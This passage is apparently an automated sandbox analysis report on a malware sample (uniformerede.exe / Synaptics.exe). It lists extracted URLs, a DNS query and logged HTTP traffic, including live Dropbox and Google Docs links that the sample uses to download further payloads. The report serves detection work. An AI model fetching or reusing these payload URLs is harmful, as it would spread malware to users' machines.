Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://roaming.edog.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://settings.outlook.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://staging.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://tasks.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://wus2.contentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: docs.google.com

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,

6_2_00474D50

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: 